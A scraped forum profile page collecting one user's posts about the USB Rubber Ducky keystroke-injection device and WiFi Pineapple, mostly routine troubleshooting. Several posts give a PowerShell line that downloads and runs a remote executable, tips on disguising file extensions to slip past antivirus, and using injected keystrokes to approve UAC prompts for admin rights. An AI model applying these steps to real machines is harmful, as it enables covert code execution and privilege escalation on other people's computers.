Jump to content

White Light

Active Members
  • Posts

    67
  • Joined

  • Last visited

  • Days Won

    2

Posts posted by White Light

  1. This was a pretty hot topic a while back (pardon the pun). Seems that the general consensus was that it's normal and completely OK for it to be quite warm, and that passive cooling already in place should be more than sufficient to keep it at safe temperatures.

  2. On 5/18/2016 at 8:49 PM, Source_Writer said:

    Thanks for your answers.

    
    6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.

    Ok. And the RD script starts after this first installation time I guess yes ? I don't need to set 15 sec delay so ?.

    No. The ducky starts to run as soon as it's plugged in, the only problem is that the computer won't respond to the keystrokes until after the driver has loaded. You will need a delay otherwise it'll start part way through.

     

    On 5/18/2016 at 8:49 PM, Source_Writer said:

     

    
    7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.

    Ok. It just rename the file so my code above is correct ? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

    I'm just scary now to keep the focus on the hidden powershell windows opened/keep it on the first plan.. I guess there is no solution.

    I'm not sure that the destination will function correctly. Variables in powershell are like $this and I don't think the web request will download the file to the correct location. You'll have to use $env:appdata instead.

  3. 1. Don't change the format of the SD card. It should come standard as FAT32 (I believe) so leave it as that. 

    2. There's no way to force powershell to stay active, as you've set the windowstyle to hidden. 

    3. No idea about any special drivers. 

    4. Stay with GUI r as you are already using. 

    5. I use the encoder from the rubber ducky github. 

    6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s. 

    7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that. 

    8. No, it won't need Java when it is running as a keyboard. 

  4. That all depends on the restrictions in place. What is important to think of is this: anything YOU can do with a keyboard, the ducky can do as well. If you can't open up the command prompt, neither can the ducky. If the registry editor is blocked for you, so it is for the ducky.

  5. Powershell is enabled, when I try [powershell Start-Process cmd -Verb runAs], it opens the cmd prompt and says it's disabled by group policy. Can I use powershell to edit the registry and allow cmd prompt?

    Powershell is a more powerful shell (hence the name) so you can basically do everything in it as in CMD, though sometimes requiring a different way.

  6. To anyone else that had this problem:

    your first payload should be named inject.bin, and will execute normally, only when no special keys are activated

    the second is named inject2.bin and executes with NUMLOCK

    the third is named inject3.bin and executes with CAPSLOCK

    hope it helps

    Thank you for including your answer after you found your solution. Now anyone with the same issue will see your post and know how to solve it themselves. It always bothers me when people just say "Nevermind, I fixed it" without explaining their solution.

  7. Nobody has the right to maintain this project?

    Few people feel :dry:

    You're complaining after <1 hour from your original post? Few people have patience :dry:

    If you actually looked at the info that was given with your ducky, you'd see you could go to USBRubberDucky.com, and from there find this page to download what you want.

    I bought USB-Rubber-Ducky
    I am a computer idiot
    Bought will not use

    But hey, if you're a "computer idiot" and "will not use" the ducky, I'll take it off your hands.

  8. I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow.

    The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue.

  9. Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.

    I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.

    That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

  10. I asked this question a bit earlier and got this response:

    Depends on which antenna you want to be stronger. The side with SD card and the vents is WLAN1(Male end). This is the antenna that does recon scanning and enters monitor mode. The other antenna is WLAN0; this handles hosting the APs that clients connect to and also hosts the management network (WLAN0-1).

    • Upvote 2
  11. Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

    You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

    (New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'
    
  12. Nice, Thanks Whistle Master.

    My Nano is quite hot after a view minute. Is there a generally known working temp (I mean the temperature it has after idk 30 Minutes online, or something.)

    I use an wifi-USB-dongle as wlan2 for client mode and run PineAP (more silent area).

    How is yours? Is it also hot, or merely warm? Thanks

    The pineapple runs very warm, this is normal. I can't remember the exact figures, but even when it's "hot", Darren assured me that it's still well within its operating temperature range and safe to use without active cooling.

    • Upvote 1
  13. Very odd. I would think it would be a function of the OS not the SIM. There really is no data on the SIM to say "Disable tethering" unless there is something I haven't seen. Would be interesting to see if the SIM had a setting. But from my experience, SIM doesn't have hardly crap on it.

    It'd be the APN settings. Fairly common for providers of unlimited data plans to block tethering.

×
×
  • Create New...